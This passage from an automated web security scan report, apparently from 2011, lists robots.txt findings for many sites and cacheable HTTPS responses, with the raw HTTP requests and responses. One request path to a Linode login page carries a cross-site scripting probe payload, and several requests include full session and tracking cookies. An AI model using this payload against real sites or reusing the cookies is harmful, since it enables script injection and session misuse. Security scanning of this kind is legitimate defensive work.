Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.64. http://www.adminitrack.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adminitrack.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adminitrack.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 14:20:32 GMT
Content-Length: 493
Content-Type: text/plain
Last-Modified: Thu, 13 Aug 2009 14:32:10 GMT
Accept-Ranges: bytes
ETag: "c6e661d7221cca1:1955"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

# Created with RoboGen SE Trial
# http://www.rietta.com/robogen/
# --------------------------------
#AdminiTrack.com, Inc. -- http://www.adminitrack.com
# Robot Exclusion File -- robots.txt
# A
...[SNIP]...

26.65. http://www.atlassian.com/software/jira  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atlassian.com
Path:   /software/jira

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atlassian.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:23 GMT
Accept-Ranges: bytes
ETag: W/"452-1259721205000"
Last-Modified: Wed, 02 Dec 2009 02:33:25 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 452
Vary: Accept-Encoding
Connection: close

User-agent: *
Disallow: /decorators
Disallow: /includes

# Disallow download page
Disallow: /software/download.jsp?
Disallow: /software/Download.jspa?

# Disallow individual pages
Disallow: /unsubscri
...[SNIP]...

26.66. http://www.axosoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.axosoft.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.axosoft.com

Response

HTTP/1.1 200 OK
Content-Length: 1638
Content-Type: text/plain
Content-Location: http://www.axosoft.com/robots.txt
Last-Modified: Mon, 23 May 2011 20:09:56 GMT
Accept-Ranges: bytes
ETag: "0c273628519cc1:1c3b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:25:13 GMT
Connection: close

# Our Google, which art in Mountain View,
# Hallowed be thy Domain Name.
# Thy Search Results Come.
# Thy Google Botting be Done,
# in Axosoft.com as it is in the GooglePlex.
# Give us this day our da
...[SNIP]...

26.67. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:48 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Last-Modified: Mon, 21 Jun 2010 19:32:33 GMT
Accept-Ranges: bytes
Content-Length: 96
Served-By: alechill
Keep-Alive: timeout=30
Connection: close
Content-Type: text/plain
Set-Cookie: bcpage=8;expires=Wed, 22-Jun-2016 20:43:48 GMT;path=/;domain=boston.com;

User-Agent: *
Sitemap: http://www.boston.com/Sitemap_index.xml
Disallow: /newsprojects/widgets/

26.68. http://www.clickmanage.com/events/clickevent.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickmanage.com
Path:   /events/clickevent.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clickmanage.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 11 Apr 2006 16:50:58 GMT
Accept-Ranges: bytes
ETag: "085341b885dc61:758"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:23 GMT
Connection: close

User-agent: *
Disallow: /

26.69. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.63.15.33
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.70. http://www.factset.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.factset.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:26 GMT
Server: Apache
Last-Modified: Fri, 16 Nov 2007 21:43:07 GMT
ETag: "1427f-15c-43f12af2150c0"
Accept-Ranges: bytes
Content-Length: 348
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /files/webinars
Disallow: /files/product_sheets/wan
Disallow: /files/extras
Disallow: /cgi-bin
Disallow: /files/download
Disallow: /files/dsdownload
Disallow: /files/Vision_Dow
...[SNIP]...

26.71. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Tue, 19 Jul 2011 12:24:01 GMT
Expires: Tue, 19 Jul 2011 12:24:01 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

26.72. http://www.googleadservices.com/pagead/conversion/1052447870/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1052447870/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Tue, 19 Jul 2011 12:24:02 GMT
Expires: Tue, 19 Jul 2011 12:24:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.73. http://www.ibegin.com/media/site/images/logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /media/site/images/logo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Jul 2011 00:00:13 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 08 Oct 2010 14:12:24 GMT
ETag: "1400db-166-4921b99814200"
Accept-Ranges: bytes
Content-Length: 358
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /contact/
Disallow: /about/
Disallow: /blog/
Disallow: /weather/share
Disallow: /weather/xml
Disallow: /weather/removelocation.php
Disallow: /weather/setlocation.php
Disallow:
...[SNIP]...

26.74. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intelex.com
Path:   /landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intelex.com

Response

HTTP/1.1 200 OK
Content-Length: 15931
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 18:06:37 GMT
Accept-Ranges: bytes
ETag: "1fe986ef79cb1:1710"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:43 GMT
Connection: close

...###############################
#
#
User-agent: *
#
# list folders robots are not allowed to index
#
Disallow: /old_images/
Disallow: /14001/
Disallow: /1_backup/
Disallow: /404notfound/
...[SNIP]...

26.75. http://www.linode.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linode.com
Path:   /index.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linode.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 14:30:59 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 16 Feb 2010 17:50:27 GMT
ETag: "2e3bd-86-47fbb5e723ec0"
Accept-Ranges: bytes
Content-Length: 134

User-agent: msnbot
Disallow: /forums/
Disallow: /support/doc/

User-agent: Googlebot
Disallow: /support/doc/
Disallow: /forums-test/


26.76. http://www.livedrive.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedrive.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livedrive.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 26 Jan 2010 15:36:13 GMT
Accept-Ranges: bytes
ETag: "e0d6b44a9d9eca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Served-By: 103
Date: Tue, 19 Jul 2011 12:24:15 GMT
Connection: close
Content-Length: 63

User-Agent: *
Disallow: /Scripts/
Disallow: /CustomErrors/

26.77. http://www.myspace.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Server: 2512620a57cd0d8af4e394cc1cb461b97e06c98e00ba7832
X-AspNet-Version: 4.0.30319
X-PoweredBy: Unicorns
Date: Tue, 19 Jul 2011 14:28:33 GMT
Connection: keep-alive
Content-Length: 660
X-Vertical: profileidentities

User-agent: *
Disallow: /my/*
Disallow: /about/*
Disallow: /signup/*
Disallow: /webim/*
Disallow: /search/*
Disallow: /AdSandbox.ashx
Disallow: /help/reportabuse?*
Disallow: /signout
Disallow
...[SNIP]...

26.78. http://www.netlogiq.ro/js/jquery.validate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlogiq.ro
Path:   /js/jquery.validate.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netlogiq.ro

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 21 May 2009 09:10:26 GMT
Accept-Ranges: bytes
ETag: "ad66b5faf3d9c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:36 GMT
Connection: close
Content-Length: 86

User-Agent: *
Disallow: /css/
Disallow: /js/
Disallow: /WebResource.axd
Allow: /

26.79. http://www.numarasoftware.com/welcome/service_desk.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.numarasoftware.com
Path:   /welcome/service_desk.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.numarasoftware.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 11 May 2011 01:34:45 GMT
Accept-Ranges: bytes
ETag: "80686e9b7bfcc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:26 GMT
Connection: close
Content-Length: 755

User-agent: *
Disallow: /pics/
Disallow: /Connections/
Disallow: /eSubmission/
Disallow: /fp/
Disallow: /HTML_HDI_BC/
Disallow: /htmle/
Disallow: /includes/
Disallow: /javascript/
Disallow: /
...[SNIP]...

26.80. http://www.rallydev.com/js/scriptaculous.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rallydev.com
Path:   /js/scriptaculous.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rallydev.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 16 Nov 2010 18:23:32 GMT
ETag: "11e-4952fa7705100"
Accept-Ranges: bytes
Content-Length: 286
Cache-Control: max-age=300
Expires: Tue, 19 Jul 2011 14:25:39 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NON DSP COR CURa PSAa PSDa OUR NOR BUS PUR COM NAV STA"
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: *
Disallow:

Sitemap: http://www.rallydev.com/sitemap.xml
Sitemap: http://www.rallydev.com/rallydev-sitemap.xml
Sitemap: http://www.rallydev.com/video-sitemap.xml
Sitemap: http://www.rally
...[SNIP]...

26.81. http://www.res-x.com/ws/r2/Resonance.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 55
Content-Type: text/plain
Last-Modified: Thu, 18 Jan 2007 19:00:12 GMT
Accept-Ranges: bytes
ETag: "08670e1323bc71:c8e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 16:04:42 GMT
Connection: close

# Disallow all web spiders
User-agent: *
Disallow: /

26.82. http://www.seapine.com/ttpro.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seapine.com
Path:   /ttpro.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seapine.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 08 Sep 2009 17:40:17 GMT
ETag: "2f0-75a30240"
Accept-Ranges: bytes
Content-Length: 752
Cache-Control: max-age=2592000
Expires: Thu, 18 Aug 2011 14:20:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

###############################
#
# Seapine's robots.txt file for www.seapine.com
#
# addresses all robots by using wild card *
#
User-agent: *
#
# list folders robots are not allowed to inde
...[SNIP]...

26.83. http://www.stubhub.com/content/getPromoContent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /content/getPromoContent

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stubhub.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: Apache
Set-Cookie: TLTHID=0269DA4EB23610B2E497C89D01B99543; Path=/; Domain=.stubhub.com
Last-Modified: Thu, 09 Jun 2011 06:36:28 GMT
Accept-Ranges: bytes
Content-Length: 11242
Keep-Alive: timeout=5, max=1474
Connection: close
Content-Type: text/plain

User-agent: Scoutjet
Disallow: *sitemap-*

User-agent: *
Disallow: /abilizer/
Disallow: /agents/
Disallow: /aggies/
Disallow: /aolcontest/
Disallow: /aollocal/
Disallow: /aolmusic/
Disallow: /aolsearc
...[SNIP]...

26.84. http://www.stumbleupon.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:02 GMT
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 1962
Date: Tue, 19 Jul 2011 14:28:27 GMT
Age: 0
Via: 1.1 varnish
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

26.85. http://www.techexcel.com/products/devsuite/devteststudio.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techexcel.com
Path:   /products/devsuite/devteststudio.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.techexcel.com

Response

HTTP/1.1 200 OK
Content-Length: 186
Content-Type: text/plain
Last-Modified: Mon, 11 Jul 2011 09:18:54 GMT
Accept-Ranges: bytes
ETag: "20b8fe8dab3fcc1:a7ae"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:30 GMT
Connection: close

User-Agent: *
Disallow: /txweb/
Disallow: /TechSupport/
Disallow: /techsupport/
Disallow: /email/
Disallow: /test/
Disallow: /devsuitehelp/
Disallow: /forum/
Disallow: /formwise/

26.86. http://www.ticketmaster.com/event/000043582C516D43  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /event/000043582C516D43

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketmaster.com

Response

HTTP/1.0 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Vary: Cookie
Last-Modified: Thu, 16 Jun 2011 21:30:37 GMT
ETag: "658-fadbb940"
Accept-Ranges: bytes
Content-Length: 1624
Content-Type: text/plain
Date: Tue, 19 Jul 2011 18:36:26 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com

User-agent: *
Disallow: /seatingchart
Disallow: /change_area
Disallow: /find_area
Disallow: /error
Disallow: /cgi/outsider.plx
Disallow: /cgi/sfxoutsider.plx
Disallow: /cgi/tt.plx
Disallow: /healthche
...[SNIP]...

27. Cacheable HTTPS response  previous  next
There are 5 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


27.1. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manager.linode.com
Path:   /session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E

Request

GET /session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:04:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2665


<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...

27.2. https://manager.linode.com/session/forgot_save/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manager.linode.com
Path:   /session/forgot_save/N

Request

GET /session/forgot_save/N HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
Referer: https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:04:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2631


<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...

27.3. https://oas.support.discoverbing.com/error.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://oas.support.discoverbing.com
Path:   /error.aspx

Request

GET /error.aspx?wfxerr=authmismatch HTTP/1.1
Host: oas.support.discoverbing.com
Connection: keep-alive
Referer: https://oas.support.discoverbing.com/default.aspx?ln=en-us&website=bing&tenant=oss&osubs=&brand=bing&c=oss_bing&as=1&st=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; AuthKey=oss_bing; WFXoss_bingToken=0; WFXLANG=en-us; WfxCookie=MSID=8fee6af6-b390-466e-93b5-9f1fca1be671; WFXSITE=gn; WFXTHEME=gn; WFXTOOLBAR=gn; WFXLANG=en-us

Response

HTTP/1.1 200 General Application Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:19:07 GMT
Content-Length: 1689

<script type="text/javascript">//<![CDATA[
document.domain='support.discoverbing.com';
if(top.suppressErrors) try{top.suppressErrors = false;}catch(e){}
//]]></script>
...[SNIP]...

27.4. https://support.discoverbing.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.discoverbing.com
Path:   /Default.aspx

Request

GET /Default.aspx?&st=1&wfxredirect=1 HTTP/1.1
Host: support.discoverbing.com
Connection: keep-alive
Referer: http://onlinehelp.microsoft.com/en-us/bing/ff808415.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 19 Jul 2011 15:18:11 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scrx=1; expires=Thu, 19-Jul-2012 15:18:11 GMT; path=/
Set-Cookie: MSIDCookie=b3669c96-3886-4430-9363-3e7a37fa4b8a; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Vary: Accept-Encoding
Content-Length: 23919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...

27.5. https://support.microsoft.com/oas/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.microsoft.com
Path:   /oas/default.aspx

Request

GET /oas/default.aspx?gprid=assistance&st=1&wfxredirect=1&sd=gn HTTP/1.1
Host: support.microsoft.com
Connection: keep-alive
Referer: http://support.microsoft.com/oas/default.aspx?gprid=assistance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; sdninc=7; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078701004:ss=1311077969178; wedcsinc=4; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.NumberOfVisits=5&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=72&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; .ASPXANONYMOUS=wyYN87p8zAEkAAAAOTJlNjVlOGEtMGU1MS00OTgxLWExZjktMTk1MGM2NTY3ZTkzBrihrgf1hSvtYtVeJLdxlWPcstU1; fmshb=0,1311089576069; exitinfo=gp|1033|csa|en-us||L_174092; WFXSMCToken=1; AuthKey=SMC; WFXLANG=en-us

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:32:54 GMT
Content-Length: 38036

